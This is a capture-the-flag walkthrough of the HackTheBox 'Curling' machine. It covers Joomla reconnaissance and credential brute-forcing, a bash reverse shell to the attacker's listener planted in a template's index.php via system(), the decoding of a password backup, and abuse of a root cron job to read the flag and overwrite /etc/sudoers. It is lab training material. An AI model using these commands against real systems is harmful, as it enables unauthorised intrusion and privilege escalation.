HackTheBox Curling Writeup
Explore the fundamentals of cybersecurity with the Curling Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.
Add Hosts
Edit the /etc/hosts file and add the following entry:
10.10.10.150 curling.htb
This ensures that your system resolves the domain name curling.htb to the correct IP address, 10.10.10.150.
Script to add hosts automatically
ip="10.10.10.150"
domain="curling.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV curling.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-13 15:58 CEST
Nmap scan report for curling.htb (10.10.10.150)
Host is up (0.050s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Determine Joomla Version
Visit the following URL to check the Joomla version:
http://curling.htb/administrator/manifests/files/joomla.xml
Brute Force
While inspecting the source of index.php, you find the following comment:
<!-- secret.txt -->
Navigate to http://curling.htb/secret.txt to find a Base64-encoded secret.
Decode it to get the password:
echo "$(curl -s http://curling.htb/secret.txt | base64 -d)" > password
Brute-Forcing Joomla Login
Use Nmap's http-joomla-brute script to brute-force the login:
cewl curling.htb | sed '1d' > cewl.out
echo "$(curl -s http://curling.htb/secret.txt | base64 -d)" > password
nmap -p 80 --script http-joomla-brute --script-args userdb=cewl.out,passdb=password,brute.mode=user,brute.firstonly=true curling.htb
rm -rf cewl.out password
This yields the credentials: Floris:Curling2018!
You can now log in at:
http://curling.htb/administrator/index.php
Obtaining a Reverse Shell
Go to Extensions > Templates or visit this direct link.
Run a listener and prepare the payload:
attackerip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo "Add in the index.php -> system('bash -c \"bash -i >& /dev/tcp/$attackerip/9001 0>&1\"');"
nc -lvnp 9001
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Extracting Password Backup
To extract and analyze files:
cp /home/floris/password_backup /dev/shm
cd /dev/shm
cat password_backup
xxd -r password_backup > 1
file 1; bzcat 1 > 2
file 2; zcat 2 > 3
file 3; bzcat 3 > 4
file 4; tar -xvf 4
cat password.txt
This yields the credentials: 5d<wdCbdZu)|hChXll
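The `file`-then-decompress sequence above, generalized as an added example (not part of the original writeup): it reverses an xxd hex dump and peels bzip2, gzip and tar layers by magic bytes rather than in a fixed order. All function names are hypothetical, and `build_sample` produces a constructed stand-in for password_backup with the same layer order.

```python
import binascii, bz2, gzip, io, tarfile

def xxd_reverse(dump: str) -> bytes:
    """Rebuild bytes from xxd output lines: 'offset: hex groups  ascii'."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" in line:
            hexpart = line.split(":", 1)[1].lstrip().split("  ", 1)[0]
            out += binascii.unhexlify(hexpart.replace(" ", ""))
    return bytes(out)

def identify(data: bytes) -> str:
    """Classify a blob by magic bytes, as `file` does between each step."""
    if data[:3] == b"BZh":
        return "bzip2"
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    return "tar" if data[257:262] == b"ustar" else "unknown"

def peel(data: bytes, max_layers: int = 16):
    """Unwrap nested layers in memory; returns (layer names, final payload)."""
    layers = []
    while len(layers) < max_layers:
        kind = identify(data)
        if kind == "bzip2":
            data = bz2.decompress(data)
        elif kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "tar":
            # Read in memory only: archive member paths are never trusted.
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                data = tf.extractfile(next(m for m in tf if m.isfile())).read()
        else:
            break
        layers.append(kind)
    return layers, data

def build_sample(secret: bytes) -> str:
    """Constructed input: tar -> bzip2 -> gzip -> bzip2 -> xxd-style hex dump."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))
    rows = [blob[i:i + 16] for i in range(0, len(blob), 16)]
    return "\n".join(f"{i * 16:08x}: {r.hex(' ', -2):<39}  " +
                     "".join(chr(b) if 32 <= b < 127 else "." for b in r)
                     for i, r in enumerate(rows))
```

Calling `peel(xxd_reverse(build_sample(b"constructed-secret\n")))` returns the layer list and the inner file's bytes. `max_layers` only bounds nesting depth, so cap the decompressed size as well when the input is untrusted.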
Logging in
To log in via SSH:
ssh floris@curling.htb
cat user.txt
cd admin-area
echo -e 'url = "file:///root/root.txt"' > input
watch -n 1 cat report
Note: Wait approximately one minute for the flag to appear.
Info
- List Cron Jobs: /var/spool/cron/crontabs/root
cd /home/floris/admin-area
echo 'url = "file://<path>"' > input
watch -n 1 cat report
Obtaining a Proper Root Shell
Use the same input-file technique as above to escalate privileges and gain a root shell:
cd /home/floris/admin-area
echo -e "%sudo ALL=(ALL:ALL) ALL\nfloris ALL=(ALL:ALL) ALL" > /tmp/sudoers
echo -e "url = \"file:///tmp/sudoers\"\noutput = \"/etc/sudoers\"" > input
watch -n 1 cat report
Switch to root user
sudo su -